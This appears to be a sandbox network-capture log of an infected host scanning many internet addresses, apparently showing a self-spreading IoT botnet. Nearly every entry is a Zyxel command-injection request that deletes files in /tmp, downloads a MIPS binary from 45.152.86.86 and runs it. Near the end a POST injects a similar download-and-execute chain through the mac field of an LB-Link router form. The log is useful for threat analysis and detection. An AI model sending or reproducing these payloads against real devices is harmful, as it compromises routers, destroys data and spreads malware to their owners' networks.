                                        Mar 31, 2024 09:22:34.766932011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8690192.168.2.2347296119.144.56.14443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.767051935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8691192.168.2.2352566125.116.9.222443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.767138004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8692192.168.2.2346140148.197.195.223443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.767138004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8693192.168.2.233679883.66.182.112443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.767138004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8694192.168.2.2356760189.217.190.107443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.767193079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8695192.168.2.2347934117.47.235.132443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.767285109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8696192.168.2.2351342204.169.212.98443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.767324924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8697192.168.2.2355994181.70.227.117443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.767378092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8698192.168.2.234234896.83.236.207443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.767419100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8699192.168.2.2354596203.24.220.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.767472029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8700192.168.2.2336112169.94.252.129443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.767518997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8701192.168.2.234758613.149.241.253443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.767568111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8702192.168.2.234509089.222.137.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.767658949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8703192.168.2.235048844.83.134.26443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.767761946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8704192.168.2.233691273.70.152.55443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.767787933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8705192.168.2.2356602182.171.69.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.767853975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8706192.168.2.2351112101.232.98.169443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.767923117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8707192.168.2.233979240.102.56.48443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.767970085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8708192.168.2.2338022150.142.253.122443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.768032074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8709192.168.2.2345372205.85.22.106443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.768074989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8710192.168.2.2345374202.184.167.130443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.768117905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8711192.168.2.2344100202.184.25.219443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.768167973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8712192.168.2.2347282193.48.2.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.768244028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8713192.168.2.2359470153.150.45.154443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.768284082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8714192.168.2.233639086.15.207.221443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.768326044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8715192.168.2.234222874.254.121.118443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.775311947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8716192.168.2.233996420.9.171.8443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.776213884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8717192.168.2.2338118135.30.55.59443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.776257038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8718192.168.2.236089688.142.52.214443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.776324034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8719192.168.2.2348514143.201.214.119443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.776422024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8720192.168.2.233919688.237.8.19443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.776479959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8721192.168.2.2352526213.106.154.12443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.776513100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8722192.168.2.234776212.196.240.243443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.776563883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8723192.168.2.235532638.187.247.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.776623964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8724192.168.2.235637495.85.69.229443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.776686907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8725192.168.2.235561077.15.222.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.776709080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8726192.168.2.234316446.116.177.202443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.776773930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8727192.168.2.234205681.183.17.85443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.776803017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8728192.168.2.2339484125.106.176.243443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.776835918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8729192.168.2.2359104195.164.98.52443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.776917934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8730192.168.2.233407293.128.170.1443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:35.753288031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8731192.168.2.234408459.130.246.191443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:35.753395081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8732192.168.2.2342032151.100.164.58443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:35.753567934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8733192.168.2.235597292.93.249.222443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:35.753623009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8734192.168.2.2347104173.0.37.181443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:35.753669977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8735192.168.2.2337486164.133.219.209443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:36.786767006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8736192.168.2.2348414176.176.101.164443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:36.786828041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8737192.168.2.2348786113.251.220.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:36.786895037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8738192.168.2.2360072156.61.94.150443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:36.786957979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8739192.168.2.2358138162.90.13.62443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:36.787029028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8740192.168.2.2360520182.42.67.65443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:36.787308931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8741192.168.2.233823851.141.239.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:36.787385941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8742192.168.2.2351062209.29.68.42443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:37.790782928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8743192.168.2.2359736130.190.233.47443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:37.790827036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8744192.168.2.233649095.140.234.113443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:37.790992022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8745192.168.2.2343812185.149.166.207443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:37.791049957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8746192.168.2.236044682.206.121.688080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:37.988713980 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:22:38.083683014 CEST1286INHTTP/1.1 400 Bad Request
                                        Server: squid
                                        Mime-Version: 1.0
                                        Date: Sun, 31 Mar 2024 07:22:38 GMT
                                        Content-Type: text/html;charset=utf-8
                                        Content-Length: 3557
                                        X-Squid-Error: ERR_INVALID_URL 0
                                        Vary: Accept-Language
                                        Content-Language: en
                                        X-Cache: MISS from ph-81abfd2a
                                        Via: 1.1 ph-81abfd2a (squid)
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 33 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 33 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 